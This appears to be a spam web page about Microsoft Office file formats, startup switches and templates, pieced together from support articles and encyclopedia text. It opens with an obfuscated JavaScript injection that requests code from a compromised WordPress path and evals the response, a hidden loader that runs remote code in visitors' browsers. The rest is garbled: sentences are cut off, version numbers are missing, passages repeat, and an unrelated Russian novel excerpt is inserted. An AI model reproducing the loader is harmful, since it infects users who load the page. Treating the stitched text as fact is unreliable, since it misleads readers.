;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//tesima.com.mk/wp-admin/css/colors/blue/blue.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B

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Microsoft office 2007 word documents are saved as a ____ file by default free.File formats that are supported in Excel

Microsoft office 2007 word documents are saved as a ____ file by default free.File formats that are supported in Excel

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Microsoft office 2007 word documents are saved as a ____ file by default free

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When you launch a Microsoft Office product, the startup process runs in a standard way. Microsoft Word, for example, displays the Word splash screen and loads the Normal template. But suppose you want Word to start without its splash screen and then load a template other than the Normal template.

Or, you want to customize the process even more by loading an add-in or running a macro upon startup. You can add options like this by using subcommands called command-line switches to an Office app’s startup command. If you want to use the customization just one time, you can type the command and switch in the Run dialog box Start menu in Microsoft Windows. If you want to use a particular switch many times or every time that you start the app, you can create a desktop shortcut that starts the program by using the same switch and parameters.

This article describes how to do both. It also includes a table that lists all of the switches and parameters that are available in the desktop Office apps. Using a command-line switch doesn’t mean you have to type the whole startup command at the command prompt.

You can start the Office app as usual, by clicking the program icon on the desktop, or by clicking the program name on the Start menu. All startup methods essentially do the same thing: they run the app’s. A command-line switch is a modifier that is added to the. A startup file with a switch looks like this.

In this example, a command-line switch has been added to the. The switch consists of a forward slash and a word or abbreviation that indicates the switch’s action. This switch tells Outlook to launch without showing the Reading Pane. A switch is sometimes followed by one or more specific instructions called parameters, which give the program further information about how to run the. For example, the following command tells Outlook to load a specific profile name upon startup. Switch names cannot be abbreviated and are not case-sensitive.

However, their parameters are sometimes case-sensitive. When you use one of the Office startup commands, you must supply the full path to the product’s. Verify the location of this file on your computer.

This table shows the locations of the. In Windows 10, click the Search or Cortana icon in the taskbar, type Run , and then click Command Prompt in the results. In the Run dialog box, type a quotation mark, enter the full path for the app’s. Alternatively, click Browse to locate and select the file. In this case, the quotation marks are supplied automatically. After the closing quotation mark, type a space, and then type the switch. For example, you might type:.

The next time you start the app, it opens as usual. To make your customized startup available for repeated uses, see the next section. You can use only one switch at a time.

Starting an Office app with multiple switches is not supported. Right-click the Windows desktop, point to New , and then click Shortcut on the shortcut menu. In the Create Shortcut Wizard , in the Type the location of the item box, type a double quotation mark ” , enter the full path for the app’s. In this case, the quotation marks are added automatically. Following the closing quotation mark, type a space, and then type the switch and any parameters.

If the parameter is a path to a location on your computer, and the path contains a space, it also must be enclosed in quotation marks. For example:. In the Type a name for this shortcut box, type a name for the shortcut, and then click Finish. To add the desktop shortcut to the Windows Start menu, right-click the shortcut, and then click Pin to Start menu on the shortcut menu. Note: These lists don’t include all switches added since Office If you use command-line switches and want information about newer switches that are available, please respond Yes or No to the “Was this information helpful” question at the end of this topic.

Then, in the box that appears, tell us which Office product and version you’re interested in. Example To start Word with a document based on a template called Myfax.

Note: Do not include a space between the switch and the name of the template file. Security Note: Because templates can store macro viruses, be careful about opening them or creating files based on new templates.

Take the following precautions: run up-to-date antivirus software on your computer, set your macro security level to high, clear the Trust all installed add-ins and templates check box, use digital signatures, and maintain a list of trusted sources.

Example To start Word and open the template file Myfax. Example To start Word and open multiple files, such as MyFile. Example To start Word and create a new document based on file MyFile. Example To start Word and open a copy of file MyFile. Word opens the file so that you can edit it.

Starts Word and prevents add-ins and global templates including the Normal template from being loaded automatically. Example To start Word and then load the add-in Sales. Note: Do not include a space between the switch and the add-in name. Security Note: Use caution when running executable files or code in macros or applications.

Executable files or code can be used to carry out actions that might compromise the security of your computer and data. Starts Word and then runs a specific macro.

Example To start Word and then run the macro Salelead, type the following at the command prompt:. Note: Do not include a space between the switch and the macro name.

Because macros can contain viruses, be careful about running them. Take the following precautions: run up-to-date antivirus software on your computer; set your macro security level to high; clear the Trust all installed add-ins and templates check box; use digital signatures; maintain a list of trusted publishers. Starts a new instance of Word with no document open. Documents opened in each instance of Word will not appear as choices in the Switch Windows list of other instances.

Starts a new instance of Word with a blank document. Documents opened in each instance of Word will not appear as choices in the Switch Windows list of the other instances. Re-registers Word in the Windows registry. This switch starts Word, runs Office Setup, updates the Windows registry, and then closes. Starts Word from the operating system shell so that Word responds to only one Dynamic Data Exchange DDE request for example, to print a document programmatically.

Specifies a folder as the active working folder for example, the folder that is pointed to in the Save As dialog box. Forces Excel to bypass all files that are stored in startup directories, such as the default XLStart folder located in the directory where Excel or Microsoft Office is installed. Note: If you use this switch without specifying a file, PowerPoint starts with no presentation open and NetMeeting conferencing is not started. Developers use this switch when testing add-ins.

This example specifies the name of the template that the new presentation is based on: templatename. After you choose options and click OK , the dialog box closes, and PowerPoint prints the file and then closes.

PrinterName is the name of the printer that appears in the Name box under Printer in the Print dialog box. The empty quotation marks are necessary; the quotation marks around PrinterName and the path to the PPTX file are needed only if there are spaces in either of the names, but it is always a good idea to use them.

Restores PowerPoint to the way it was before the program closed abnormally. When PowerPoint restarts, it will attempt to recover and restore some aspects of the state of the program and presentations before it closed.

Note: The playlist file is a list of presentation file names preceded by the path as needed. It is not possible to add additional command-line switches to the individual presentations within the playlist.

If no item type is specified, IPM. Note is assumed. Cannot be used with message classes that are not based on Outlook. Deletes any custom category names that you have created. Restores categories to the default names. CAT entries for a conversation thread usually expire 30 days after no activity.

The command-line switch clears all conversation tagging, ignore, and moving rules immediately stopping any additional actions. Outlook , only. All previous roamed preferences are deleted and copied again from the local settings on the computer where this switch is used.

Therefore, it is recommended that you only run this command when your Outlook profile only contains the one, target mailbox. This is useful if you cannot delete one of these subscriptions within Outlook Overrides the programmatic lockout that determines which of your computers when you run Outlook at the same time processes meeting items. The lockout process helps prevent duplicate reminder messages. This switch clears the lockout on the computer it is used. This enables Outlook to process meeting items.

Imports the contents of an.

Opening a Word Document file in a version of Word other than the one with which it was created can cause an incorrect display of the document. The document formats of the various versions change in subtle and not so subtle ways such as changing the font or the handling of more complex tasks like footnotes.

Formatting created in newer versions does not always survive when viewed in older versions of the program, nearly always because that capability does not exist in the previous version. In October , one year before the Microsoft Office suite was released, Microsoft declared that there was insufficient demand from Microsoft customers for the international standard OpenDocument format support and that therefore it would not be included in Microsoft Office This statement was repeated in the following months.

This work was started in response to government requests for interoperability with ODF. The goal of project was not to add ODF support to Microsoft Office, but only to create a plugin and an external tool-set. Among its features, Word includes a built-in spell checker, a thesaurus, a dictionary, and utilities for manipulating and editing text. The following are some aspects of its feature set. Several later versions of Word include the ability for users to create their formatting templates, allowing them to define a file in which: the title, heading, paragraph, and other element designs differ from the standard Word templates.

For example, Normal. It determines the margin defaults as well as the layout of the text and font defaults. Although Normal. This will change other documents which were created using the template. It can also be used to create and display simple line art. Microsoft Word added support [81] for the common SVG vector image format in for Office ProPlus subscribers and this functionality was also included in the Office release.

WordArt enables drawing text in a Microsoft Word document such as a title, watermark, or other text, with graphical effects such as skewing, shadowing, rotating, stretching in a variety of shapes and colors, and even including three-dimensional effects. Users can apply formatting effects such as shadow, bevel, glow, and reflection to their document text as easily as applying bold or underline. Users can also spell-check text that uses visual effects and add text effects to paragraph styles.

A Macro is a rule of pattern that specifies how a certain input sequence often a sequence of characters should be mapped to an output sequence according to a defined process.

Frequently used or repetitive sequences of keystrokes and mouse movements can be automated. Like other Microsoft Office documents, Word files can include advanced macros and even embedded programs. This extensive functionality can also be used to run and propagate viruses in documents. The tendency for people to exchange Word documents via email, USB flash drives , and floppy disks made this an especially attractive vector in A prominent example was the Melissa virus , but countless others have existed.

These macro viruses were the only known cross-platform threats between Windows and Macintosh computers and they were the only infection vectors to affect any macOS system up until the advent of video codec trojans in Word’s macro security setting, which regulates when macros may execute, can be adjusted by the user, but in the most recent versions of Word, it is set to HIGH by default, generally reducing the risk from macro-based viruses, which have become uncommon.

Before Word Word 14 for Windows, the program was unable to correctly handle ligatures defined in OpenType fonts. Since Word , the program now has advanced typesetting features which can be enabled, [83] OpenType ligatures, [84] kerning and hyphenation previous versions already had the latter two features. Other layout deficiencies of Word include the inability to set crop marks or thin spaces. Various third-party workaround utilities have been developed.

In Word for Mac OS X, support of complex scripts was inferior even to Word 97 [86] and Word did not support Apple Advanced Typography features like ligatures or glyph variants. Microsoft word is only awkwardly suitable for some kinds of technical writing, specifically, that which requires: mathematical equations , figure placement, table placement and cross-references to any of these items. The usual workaround for equations is to use a third-party equation typesetter.

Figures and tables must be placed manually; there is an anchor mechanism but it is not designed for fully automatic figure placement and editing text after placing figures and tables often requires re-placing those items by moving the anchor point and even then the placement options are limited.

This problem is deeply baked into Word’s structure since as it does not know where page breaks will occur until the document is printed. Microsoft Word supports bullet lists and numbered lists. It also features a numbering system that helps add correct numbers to pages, chapters, headers, footnotes, and entries of tables of content; these numbers automatically change to correct ones as new items are added or existing items are deleted.

Bullets and numbering can be applied directly to paragraphs and converted to lists. In particular, a second irrelevant numbered list might have not started with number one but instead resumed numbering after the last numbered list.

Although Word 97 supported a hidden marker that said the list numbering must restart afterward, the command to insert this marker Restart Numbering command was only added in Word However, if one were to cut the first item of the listed and paste it as another item e. Users can also create tables in Word. Depending on the version, Word can perform simple calculations — along with support for formulas and equations as well.

Word continues to default to non-Unicode characters and non-hierarchical bulleting, despite user preference for Powerpoint-style symbol hierarchies e.

Available in certain versions of Word e. According to Ron Fein of the Word 97 team, AutoSummarize cuts wordy copy to the bone by counting words and ranking sentences. First, AutoSummarize identifies the most common words in the document barring “a” and “the” and the like and assigns a “score” to each word — the more frequently a word is used, the higher the score.

Then, it “averages” each sentence by adding the scores of its words and dividing the sum by the number of words in the sentence — the higher the average, the higher the rank of the sentence. AutoSummarize was removed from the Office release version 14 as well. Word Mobile is a word processor that allows creating and editing documents. It supports basic formatting, such as bolding, changing font size, and changing colors from red, yellow, or green. It can add comments, but can’t edit documents with tracked changes.

It can’t open password protected documents, change the typeface, text alignment, or style normal, heading 1 ; create bulleted lists; insert pictures; or undo. Word for the web is a free lightweight version of Microsoft Word available as part of Office on the web, which also includes web versions of Microsoft Excel and Microsoft PowerPoint. Word for the web lacks some Ribbon tabs, such as Design and Mailings. Mailings allows users to print envelopes and labels and manage mail merge printing of Word documents.

Certain advanced features like table sorting or columns will not be displayed but are preserved as they were in the document. Other views available in the Word desktop app Outline, Draft, Web Layout and Full Screen Reading are not available, nor are side-by-side viewing, split windows and the ruler. The second and third password types were developed by Microsoft for convenient shared use of documents rather than for their protection.

There is no encryption of documents that are protected by such passwords and the Microsoft Office protection system saves a hash sum of a password in a document’s header where it can be easily accessed and removed by the specialized software. Password to open a document offers much tougher protection that had been steadily enhanced in the subsequent editions of Microsoft Office.

Word 95 and all the preceding editions had the weakest protection that utilized a conversion of a password to a bit key. Key length in Word 97 and was strengthened up to 40 bit. However, modern cracking software allows removing such a password very quickly — a persistent cracking process takes one week at most. Use of rainbow tables reduces password removal time to several seconds.

Security Note: Because templates can store macro viruses, be careful about opening them or creating files based on new templates. Take the following precautions: run up-to-date antivirus software on your computer, set your macro security level to high, clear the Trust all installed add-ins and templates check box, use digital signatures, and maintain a list of trusted sources.

Example To start Word and open the template file Myfax. Example To start Word and open multiple files, such as MyFile. Example To start Word and create a new document based on file MyFile. Example To start Word and open a copy of file MyFile. Word opens the file so that you can edit it. Starts Word and prevents add-ins and global templates including the Normal template from being loaded automatically. Example To start Word and then load the add-in Sales.

Note: Do not include a space between the switch and the add-in name. Security Note: Use caution when running executable files or code in macros or applications. Executable files or code can be used to carry out actions that might compromise the security of your computer and data. Starts Word and then runs a specific macro.

Example To start Word and then run the macro Salelead, type the following at the command prompt:. Note: Do not include a space between the switch and the macro name.

Because macros can contain viruses, be careful about running them. Take the following precautions: run up-to-date antivirus software on your computer; set your macro security level to high; clear the Trust all installed add-ins and templates check box; use digital signatures; maintain a list of trusted publishers. Starts a new instance of Word with no document open. Documents opened in each instance of Word will not appear as choices in the Switch Windows list of other instances.

Starts a new instance of Word with a blank document. Documents opened in each instance of Word will not appear as choices in the Switch Windows list of the other instances. Re-registers Word in the Windows registry.

This switch starts Word, runs Office Setup, updates the Windows registry, and then closes. Starts Word from the operating system shell so that Word responds to only one Dynamic Data Exchange DDE request for example, to print a document programmatically.

Specifies a folder as the active working folder for example, the folder that is pointed to in the Save As dialog box. Forces Excel to bypass all files that are stored in startup directories, such as the default XLStart folder located in the directory where Excel or Microsoft Office is installed. Note: If you use this switch without specifying a file, PowerPoint starts with no presentation open and NetMeeting conferencing is not started.

Developers use this switch when testing add-ins. This example specifies the name of the template that the new presentation is based on: templatename. After you choose options and click OK , the dialog box closes, and PowerPoint prints the file and then closes.

PrinterName is the name of the printer that appears in the Name box under Printer in the Print dialog box. The empty quotation marks are necessary; the quotation marks around PrinterName and the path to the PPTX file are needed only if there are spaces in either of the names, but it is always a good idea to use them.

Restores PowerPoint to the way it was before the program closed abnormally. When PowerPoint restarts, it will attempt to recover and restore some aspects of the state of the program and presentations before it closed. Note: The playlist file is a list of presentation file names preceded by the path as needed. It is not possible to add additional command-line switches to the individual presentations within the playlist.

If no item type is specified, IPM. Note is assumed. Cannot be used with message classes that are not based on Outlook. Deletes any custom category names that you have created. Restores categories to the default names. CAT entries for a conversation thread usually expire 30 days after no activity.

Archived from the original on September 10, Archived from the original on May 24, Retrieved May 25, Archived from the original on July 3, I Started Something.

Retrieved March 19, Jensen Harris’ blog. Archived from the original on February 12, Microsoft Office website. Retrieved March 31, Retrieved March 4, Network World. Archived from the original on May 9, Archived from the original on May 15, Archived from the original on November 1, Retrieved October 26, Archived from the original on September 27, Archived from the original on December 31, Archived from the original on February 14, Archived from the original on February 9, Retrieved June 3, Archived from the original on December 18, Archived from the original on April 2, Archived from the original on April 29, Retrieved May 1, Download Center.

November 8, Archived from the original on February 10, Retrieved February 11, Archived from the original on April 20, Retrieved April 17, Open Document Alliance.

ODF Alliance. May 19, Archived from the original on January 19, Retrieved May 22, Archived from the original on January 3, Retrieved May 23, Sun Microsystems.

Retrieved January 27, Heise Online. July 4, Archived from the original on July 11, Retrieved July 6, SD Times. Archived from the original on July 18, Document Interop Initiative. Rightmost frame: Implementation Notes List. Retrieved January 10, May 5, Office Interoperability. Rob Weir: An Antic Disposition.

Archived from the original on November 30, Orcmid’s Lair. August 3, Archived from the original on September 2, Archived from the original on January 26, Unicode, Inc.

April 4, Archived PDF from the original on February 6, Retrieved December 19, Retrieved October 2, May 12, Archived from the original on May 21, John Bryntze’s Knowledge Base. Archived from the original on November 22, Retrieved May 2, Retrieved November 11, SuperSite for Windows.

Archived from the original on October 9, Retrieved September 17, Archived from the original on April 13, Retrieved July 15, Retrieved 2 January Archived from the original on 16 June Retrieved 7 September Archived from the original on 21 July Retrieved 30 October Archived from the original on 22 July Archived from the original on 23 March Archived from the original on 4 February Retrieved 9 January Archived from the original on 29 July Retrieved 27 May Retrieved 28 January Retrieved 9 March Sun Microsystems.

Retrieved 27 January Heise Online. Archived from the original on 11 July Retrieved 6 July The Register. PC World. Archived from the original PDF on 11 June Retrieved 24 May However, the location is typically a shared folder on a network drive. Your network administrator may set a shared location as a source from which to provide templates that are used throughout your workgroup or company. The workgroup template file location typically is a read-only shared folder.

In addition to looking in your default user templates file location for existing templates, and Office programs look in the workgroup templates file location for more templates. For more information about the workgroup templates file location and about how to share a template with your workgroup or your company, contact your network administrator.

Advertised templates are the templates that are included with Office programs. These templates appear in the Templates dialog box. Depending on the type of Office installation, you may not have all the templates installed on the computer.

However, each Office program displays the templates as they are available in the Templates dialog box. When you select a template, the Office program determines whether the template is installed.

If the template is installed, a new document that is based on the template opens. If the template is advertised but is not installed, the program prompts you to install the template.

You can remove installed templates for Publisher by starting the Office installation program. Then, set the template group to Installed on First Use. This effectively removes the templates from the computer.

A file format for saving Word , Word , and Word files so that they can be opened in document applications that use the OpenDocument format. Users can also open documents in the. Formatting might be lost when users save and open. It preserves document formatting and enables file sharing.

Important: PDF files might not have a perfect page-to-page correspondence with the original. For example, the pages might break at different locations. RTF controls the representation and formatting of a document, both on the screen and in print.

When they use the. When users save a document as a. This is the default file format of Microsoft Works, versions 6. XML Paper Specification, a file format that preserves document formatting and enables file sharing. When the XPS file is viewed online or printed, it keeps exactly the format that users intended, and the data in the file cannot be easily changed. Saves a workbook as a comma-delimited text file for use on another Windows operating system, and makes sure that tab characters, line breaks, and other characters are interpreted correctly.

Saves only the active sheet. Saves a workbook as a comma-delimited text file for use on the Macintosh operating system, and makes sure that tab characters, line breaks, and other characters are interpreted correctly.

Saves a workbook as a comma-delimited text file for use on the MS-DOS operating system, and makes sure that tab characters, line breaks, and other characters are interpreted correctly. Users can open these files formats in Excel , Excel , and Excel , but, users can’t save an Excel file to dBase format.

A web page that is saved as a single file that includes an. A file format for saving Excel , Excel , and Excel files so that they can be opened in spreadsheet applications that use the OpenDocument Spreadsheet format, such as Google Docs and OpenOffice. Users can also open spreadsheets in the. When users save and open. The Lpod project is an example.

One important issue raised in the discussion of OpenDocument is whether the format is accessible to those with disabilities. There are two issues: does the specification support accessibility, and are implementations accessible? Peter Korn an accessibility expert reviewed version 1.

Peter Korn gave an in-depth report [99] on OpenDocument accessibility. He noted that there are many kinds of impairments, including visual minor, major, or blind , physical minor, major with vocal control, major without vocal control , auditory, and cognitive.

He then noted that the situation varies, depending on the specific disability. For a vast number of disabilities, there are no known problems, though.

It is important to note that since OpenDocument is an Open Standard file format, there is no need for everyone to use the same program to read and write OpenDocument files; someone with a disability is free to use whatever program works best for them. From Wikipedia, the free encyclopedia. For the portable building, see Mobile office. This article has multiple issues. Please help improve it or discuss these issues on the talk page.

Learn how and when to remove these template messages. This article may require cleanup to meet Wikipedia’s quality standards. No cleanup reason has been specified. Please help improve this article if you can.

September Learn how and when to remove this template message. This article contains content that is written like an advertisement. Please help improve it by removing promotional content and inappropriate external links , and by adding encyclopedic content written from a neutral point of view. Retrieved 1 May Adobe Systems.

Archived from the original on 16 February Retrieved 28 February Archived from the original on 27 June Retrieved 1 June MW Software.

However, templates can be set to Not Available in Access The other Office programs do not list templates as a separate component. By default, all templates that are installed with Microsoft Office are installed in the following folder:. The Language ID Number is a four-digit code that represents the language types that are currently installed. For example, the English US version of Office installs a folder. The Arabic version installs a folder.

The German version installs a folder. Additionally, you can have multiple languages installed at the same time. Therefore, you may have a Templates folder that contains several language ID folders. Office programs use non-file-based templates to create new workbooks, documents, databases, and slides. As the name suggests, there is no physical template from which these special files are created.

Each Office program has the necessary information to create a new file of the correct type. For example, if the Word global template Normal. This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs.

For more information about how to back up and restore the registry, see How to back up and restore the registry in Windows. It also includes a table that lists all of the switches and parameters that are available in the desktop Office apps. Using a command-line switch doesn’t mean you have to type the whole startup command at the command prompt.

You can start the Office app as usual, by clicking the program icon on the desktop, or by clicking the program name on the Start menu. All startup methods essentially do the same thing: they run the app’s. A command-line switch is a modifier that is added to the. A startup file with a switch looks like this. In this example, a command-line switch has been added to the. The switch consists of a forward slash and a word or abbreviation that indicates the switch’s action.

This switch tells Outlook to launch without showing the Reading Pane. A switch is sometimes followed by one or more specific instructions called parameters, which give the program further information about how to run the. For example, the following command tells Outlook to load a specific profile name upon startup. Switch names cannot be abbreviated and are not case-sensitive. However, their parameters are sometimes case-sensitive.

When you use one of the Office startup commands, you must supply the full path to the product’s. Verify the location of this file on your computer. This table shows the locations of the. In Windows 10, click the Search or Cortana icon in the taskbar, type Run , and then click Command Prompt in the results.

In the Run dialog box, type a quotation mark, enter the full path for the app’s. Alternatively, click Browse to locate and select the file. In this case, the quotation marks are supplied automatically.

After the closing quotation mark, type a space, and then type the switch. For example, you might type:. The next time you start the app, it opens as usual. To make your customized startup available for repeated uses, see the next section. You can use only one switch at a time. Starting an Office app with multiple switches is not supported. Right-click the Windows desktop, point to New , and then click Shortcut on the shortcut menu. In the Create Shortcut Wizard , in the Type the location of the item box, type a double quotation mark ” , enter the full path for the app’s.

In this case, the quotation marks are added automatically. Following the closing quotation mark, type a space, and then type the switch and any parameters. If the parameter is a path to a location on your computer, and the path contains a space, it also must be enclosed in quotation marks. For example:. In the Type a name for this shortcut box, type a name for the shortcut, and then click Finish. To add the desktop shortcut to the Windows Start menu, right-click the shortcut, and then click Pin to Start menu on the shortcut menu.

Note: These lists don’t include all switches added since Office If you use command-line switches and want information about newer switches that are available, please respond Yes or No to the “Was this information helpful” question at the end of this topic.

Then, in the box that appears, tell us which Office product and version you’re interested in. Example To start Word with a document based on a template called Myfax. Note: Do not include a space between the switch and the name of the template file. Security Note: Because templates can store macro viruses, be careful about opening them or creating files based on new templates.

Take the following precautions: run up-to-date antivirus software on your computer, set your macro security level to high, clear the Trust all installed add-ins and templates check box, use digital signatures, and maintain a list of trusted sources. Example To start Word and open the template file Myfax. Example To start Word and open multiple files, such as MyFile. Example To start Word and create a new document based on file MyFile.

Example To start Word and open a copy of file MyFile. Word opens the file so that you can edit it. Starts Word and prevents add-ins and global templates including the Normal template from being loaded automatically. Example To start Word and then load the add-in Sales.

Note: Do not include a space between the switch and the add-in name. Security Note: Use caution when running executable files or code in macros or applications. Executable files or code can be used to carry out actions that might compromise the security of your computer and data. Starts Word and then runs a specific macro. Example To start Word and then run the macro Salelead, type the following at the command prompt:.

The following table describes the file formats that are supported in Word, alphabetized by extension. This section provides additional file formats and whether they are supported in the applications in Office. Users can paste data from the Office Clipboard into Word, Excel, and PowerPoint if the Office Clipboard data is in one of the formats shown in the following table. If the file format that users want to use is not supported, they can try the following methods to open the file.

Search the internet for a company that makes file format converters for file formats that are not supported in the application.

Save to a file format that another program supports. For example, users might want to import their Word, Excel, or PowerPoint file into another program that does not support the application’s native file format. However, the other program might support importing another supported file format, such as a text file format. In this case, users can save their work in text file format, and then from the other program, import the text file.

Skip to main content. This browser is no longer supported. Download Microsoft Edge More info. Table of contents Exit focus mode. Table of contents. Submit and view feedback for This product This page. View all page feedback. In this article.

See Create a template for more information. You might want to save your file in another format so that you, or somebody else, can open the file in a different program or older version.

XLSX, or. In the Save as type list, click the file format that you want to save the file in. For example, click Rich Text Format. For more information about how to save files in PDF. How you back up and recover your files depends on where and when you saved it.

To learn more about a feature, including which versions of Office support it, select the name of the feature in the table below. Version History. Version History lets you view and restore previous versions of files stored in OneDrive or SharePoint in Microsoft Back up with OneDrive. Also see Files save to OneDrive by default in Windows Restore your OneDrive subscription only. You can restore your entire OneDrive to a previous time if your OneDrive files are deleted, overwritten, corrupted, or infected by malware.

Restore deleted files or folders in OneDrive. If AutoRecover is turned on and your file closes unexpectedly, Document Recovery opens the next time you open the Office app. You can also recover an earlier version of an Office file. Important: Even if AutoRecover is turned on, you should save the file frequently while you’re working on it to avoid losing data because of an unexpected power failure or other problem. You can save a copy as a new file , or in a different format , or to a different location in Office Tip: If you’re going to create a new file, based on an existing file, but only want your changes saved in the new file it’s a good idea to do the Save a Copy process first thing; before you’ve made any changes.

During the Save, or Save a Copy, process described above you can choose a different location to save your file. It could run in text mode or graphics mode but the visual difference between the two was minor. In graphics mode, the document and interface were rendered in a fixed font size monospace character grid with italic, bold and underline features that was not available in text mode. It had support for style sheets in separate files. A Macintosh version named Word 1. The three products shared the same Microsoft Word name, the same version numbers but were very different products built on different code bases.

Three product lines co-existed: Word 1. Word 1. Word 4. Word 5. The macro language differed from the WinWord 1. Word 6. The Word 6. The failure of WordPerfect to produce a Windows version proved a fatal mistake.

The following year, in , WinWord 2. WinWord 6. The early versions of Word also included copy protection mechanisms that tried to detect debuggers , and if one was found, it produced the message “The tree of evil bears bitter fruit. Only the Shadow knows. Now trashing program disk. After MacWrite , Word for Macintosh never had any serious rivals, although programs such as Nisus Writer provided features such as non-continuous selection, which were not added until Word in Office XP.

However, version 6. It was the first version of Word based on a common code base between the Windows and Mac versions; many accused the Mac version of being slow, clumsy and memory intensive.

With the release of Word 6. There may have also been thought given to matching the current version 6. However, this wound up being the last version of Word for DOS. Microsoft Office Access does not allow for templates to be advertised. However, templates can be set to Not Available in Access The other Office programs do not list templates as a separate component. By default, all templates that are installed with Microsoft Office are installed in the following folder:.

The Language ID Number is a four-digit code that represents the language types that are currently installed. For example, the English US version of Office installs a folder. The Arabic version installs a folder. The German version installs a folder. Additionally, you can have multiple languages installed at the same time. Therefore, you may have a Templates folder that contains several language ID folders.

Office programs use non-file-based templates to create new workbooks, documents, databases, and slides. As the name suggests, there is no physical template from which these special files are created. Each Office program has the necessary information to create a new file of the correct type. For example, if the Word global template Normal. This section, method, or task contains steps that tell you how to modify the registry.

He then noted that the situation varies, depending on the specific disability. For a vast number of disabilities, there are no known problems, though. It is important to note that since OpenDocument is an Open Standard file format, there is no need for everyone to use the same program to read and write OpenDocument files; someone with a disability is free to use whatever program works best for them.

From Wikipedia, the free encyclopedia. For the portable building, see Mobile office. This article has multiple issues. Please help improve it or discuss these issues on the talk page. Learn how and when to remove these template messages. This article may require cleanup to meet Wikipedia’s quality standards. No cleanup reason has been specified. Please help improve this article if you can. September Learn how and when to remove this template message.

This article contains content that is written like an advertisement. Please help improve it by removing promotional content and inappropriate external links , and by adding encyclopedic content written from a neutral point of view. Retrieved 1 May Adobe Systems. Archived from the original on 16 February Retrieved 28 February Archived from the original on 27 June Retrieved 1 June MW Software. Retrieved 16 February

Эхо выстрела слилось с царившим вокруг хаосом. Сознание гнало ее вперед, но ноги не слушались. Коммандер. Мгновение спустя она, спотыкаясь, карабкалась вверх по ступенькам, совершенно забыв о таящейся внизу опасности. Она двигалась вслепую, скользя на гладких ступеньках, и скопившаяся влага капала на нее дождем.


Save, back up, and recover a file in Microsoft Office.Microsoft office 2007 word documents are saved as a ____ file by default free

Sep 30,  · This is the default file format of Microsoft Works, versions through xml: Word XML Document: The XML format supported in Office Word xml: Word XML Document: The XML file format supported in Word , Word , Word , Word , and Office Word (Open XML)replace.me: XPS Document. Using a command-line switch doesn’t mean you have to type the whole startup command at the command prompt. You can start the Office app as usual, by clicking the program icon on the desktop, or by clicking the program name on the Start menu. All startup methods essentially do the same thing: they run the app’replace.me file, even if you don’t actually type the command or . Word uses a new file format called docx. The release of Word has brought Word a cleaner look and this version focuses further on Cloud Computing with documents being saved automatically to OneDrive (previously Skydrive). If enabled, documents and settings roam with the user. Microsoft Office is a free/paid subscription. Office continues the use of the XML-based file formats, such replace.me,.xlsx, replace.me, introduced in the Office release. Therefore, files created in Microsoft Word , Microsoft Excel , and Microsoft PowerPoint can be opened in the Office release programs without special add-ins or loss of functionality. By default, the Encrypt connection check box is selected to signify that Power Query connects to your database using an encrypted connection. If you do not want to connect using an encrypted connection, clear this check box, and then click Connect.. If a connection to your SQL Server is not established using an encrypted connection, Power Query prompts you to connect using an .

Upgrade to Microsoft Edge microsoft office 2007 word documents are saved as a ____ file by default free take advantage of the latest features, security updates, and technical support.

This article describes the different types and locations of templates in Microsoft Office programs and in Office programs. Additionally, увидеть больше article contains information about registry settings that control where you microsofh custom templates.

A Microsoft Office program looks in one of the following locations for the templates that belong to that program:. Newly created or newly modified templates are saved in a folder in your worx directory.

The folders that are under your profile contain your configuration preferences and options. These folders http://replace.me/461.txt everything microwoft is needed for a roaming user profile. You can use Microsoft Office Word to change micgosoft location in which your new templates are saved. To do this, cocuments these steps. If you use Word or Word to change the location in which your new templates are saved, you also change the location in which all Office program templates or all Office program templates are saved.

